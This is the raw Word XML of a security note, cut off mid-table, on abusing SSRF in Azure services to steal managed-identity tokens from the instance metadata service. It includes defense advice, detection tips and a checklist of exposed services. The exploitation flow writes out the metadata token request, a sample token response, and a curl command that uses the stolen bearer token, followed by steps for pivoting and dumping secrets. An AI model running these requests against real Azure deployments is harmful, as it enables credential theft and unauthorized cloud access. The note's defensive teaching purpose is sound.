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522B" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Azure SSRF → Managed Identity Credential Theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBB2C63" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A2BA0A" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">In Azure, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Instance Metadata Service (IMDS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> provides tokens for </w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed Identities</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> (user-assigned or system-assigned).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC7F6F0" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>IMDS is accessible via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11591ED8" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>http://169.254.169.254/metadata/identity/oauth2/token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23010D27" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">By abusing </w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> or RCE in an Azure-hosted app (e.g., App Service, Function, VM), an attacker can request access tokens tied to the instance's managed identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A624BFC" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="2809F2F1" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Azure SSRF Exploitation Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B9CCB6" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Locate a vulnerable service</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> (e.g., web app, function) that allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> or RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EF2EB2" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Craft a metadata token request</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDF2E90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>GET /metadata/identity/oauth2/token?api-version=2019-08-01&amp;resource=https://management.azure.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190A4A98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>Host: 169.254.169.254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADC5B7F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>Metadata: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AEEC68" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Send request via SSRF or local RCE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB02061" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Extract access token</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> from response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED717D5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>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBA241E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 xml:space="preserve">  "access_token": "eyJ0eXAiOiJKV1Qi...",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C084F4A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 xml:space="preserve">  "expires_in": "3599",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D6B328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 xml:space="preserve">  "token_type": "Bearer"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A3E73D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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EAE39B" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use token with Azure CLI or REST API</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282A7FFC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>az login --identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017CB5C0" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>curl -H "Authorization: Bearer &lt;access_token&gt;" https://management.azure.com/subscriptions?api-version=2020-01-01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28553A01" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enumerate privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t>, pivot, or exfiltrate secrets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689EF521" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Access Key Vault: https://vault.azure.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352EE43E" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Query Microsoft Graph: https://graph.microsoft.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F6FA3C" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Dump storage, secrets, or deploy further persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EAB63A" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="425D8E29" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Defense (Blue Team Note)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A23927D" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Restrict public exposure</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> of services handling user-supplied URLs or request proxies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B785D9" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enable App Service VNet Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> and use </w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NSGs</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> to prevent access to 169.254.169.254.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5896B7C3" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conditional Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defender for Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed Identity least privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29149D31" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="16DF231D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Detection Tips</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0952DFDD" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Monitor for unexpected access to 169.254.169.254 from applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B62C9F9" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Look for anomalous token use via Azure Activity Logs or Graph API calls from app identities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EB2123" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026300BA" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Checklist: Azure Services Vulnerable to SSRF-Based Metadata Theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1F9E36" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="770551C3" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Here’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>checklist of Azure services</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> and components that are either </w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vulnerable to SSRF-based metadata theft</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> or have been </w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>used in real-world attack chains</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> involving SSRF to steal Managed Identity tokens from the Instance Metadata Service (IMDS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221E9602" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="0A6DA16C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1. Azure Virtual Machines (VMs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD665C8" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSRF or RCE in VM-hosted app</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> can access IMDS at http://169.254.169.254/metadata/identity/oauth2/token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0B704F" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No network restrictions</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E091EB" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="1D4AAABB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2. Azure App Services (Web Apps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548490EA" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Public-facing apps accepting URL input (e.g., image fetchers, webhook relays)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB837B2" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Vulnerable SSRF allows access to IMDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423DADF0" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Token fetch endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534696D8" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="000C7FE9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://169.254.169.254/metadata/identity/oauth2/token</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5615C152" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="1BA6535D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3. Azure Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D8D1D4" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Especially when used as backend APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F690F3" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>SSRF or insecure deserialization can lead to token exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C239970" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">Often assigned </w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System-Assigned Managed Identity</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> for access to Storage, Key Vault, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC22B64" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="10075CAB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4. Azure Container Instances (ACI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057ACE96" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Access to IMDS over local IP is often enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53540863" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Containers may expose web servers or APIs that are SSRF-prone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D2AB22" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="01FC2A25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5. Azure Kubernetes Service (AKS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E98B68" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pods using Managed Identity (via AAD Pod Identity)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> can be SSRF targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3795F6F1" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Exploiting apps within pods can yield tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2F4416" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="2353ACE0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6. Azure App Gateway with WAF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1BDFA5" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Sometimes misconfigured to allow SSRF chaining through backend routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345FA7B7" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Can be paired with vulnerable web apps to proxy token requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B1EB19" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="48951332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7. Azure Logic Apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0E3B56" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Improper use of HTTP connectors or webhook-based logic flows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F070160" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>May expose internal services that can be abused via SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACC7D04" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="51E4E4AF" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="5525EC6F" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="2AEC3684" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Known SSRF Exploitation Patterns in Azure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F437C6" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="000877C5" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4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4324"/>
        <w:gridCol w:w="2954"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w14:paraId="310D0BF2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C8E42" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
